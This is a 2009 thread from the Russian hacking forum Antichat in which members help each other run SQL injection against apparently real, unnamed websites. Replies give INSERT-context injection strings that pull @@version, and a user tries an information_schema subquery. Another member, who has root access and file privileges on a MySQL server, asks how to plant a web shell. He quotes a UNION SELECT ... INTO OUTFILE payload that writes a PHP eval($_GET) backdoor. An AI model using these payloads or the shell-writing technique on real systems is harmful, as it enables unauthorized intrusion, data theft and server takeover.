HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9841  
Старый 05.11.2009, 20:17
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от jecka3000  
ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
Здесь INSERT, так что читай ещё мануалы.
 
Ответить с цитированием

  #9842  
Старый 05.11.2009, 20:22
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

jecka3000 вставь:
@@version,1,1,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9843  
Старый 05.11.2009, 20:36
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Scipio, не катит
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/scripts/UserStatistic.asp, line 26
Ctacok, расскажи поподробнее, что означает insert и что прочесть?
 
Ответить с цитированием

  #9844  
Старый 05.11.2009, 20:43
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

давай ссылку тогда, просто @@version надо подставить в нестроковое поле
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9845  
Старый 05.11.2009, 20:53
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

1',@@version,1,1,1,1)+--+
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9846  
Старый 05.11.2009, 21:16
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Scipio,кстати, а чтож тогда делать с information_schema?
1',=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)+--+ ?
 
Ответить с цитированием

  #9847  
Старый 05.11.2009, 21:31
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

хехе, не получится использовать подзапросы здесь
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #9848  
Старый 05.11.2009, 22:34
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

Scipio, ну посоветуй что нибудь, я вообще в такой ситуации первый раз, может быть мануал какой нить есть)
 
Ответить с цитированием

  #9849  
Старый 06.11.2009, 05:07
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами: 9764446

Репутация: 123
По умолчанию

Всем привет.
Есть сервак со след параметрами

base:articles
ver:5.1.36-community
user:root@localhost
basedir:C:\Program Files\MySQL\MySQL Server 5.1\
datadir:C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
os:Win32
mysql.password:****
mysql.user:****
tmpdir:C:\WINDOWS\TEMP
file_priv:Y

Собственно интересна возможность заливки шелла.
Если есть статьи какие нибудь про load_file- накидайте ссылок (я ничего толкового не нашел). И еще интересует возможность использования
mysql.password:****
mysql.user:****
Где и как можно узнать хост на котором БД.

Сорри, если что-то не так понял и неправильно написал.


Зы
Цитата:
-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?

Заранее спасибо. С меня +++ за помощь.
 
Ответить с цитированием

  #9850  
Старый 06.11.2009, 05:16
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от hackmen  
Где и как можно узнать хост на котором БД.
Цитата:
Сообщение от hackmen  
user:root@localhost
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.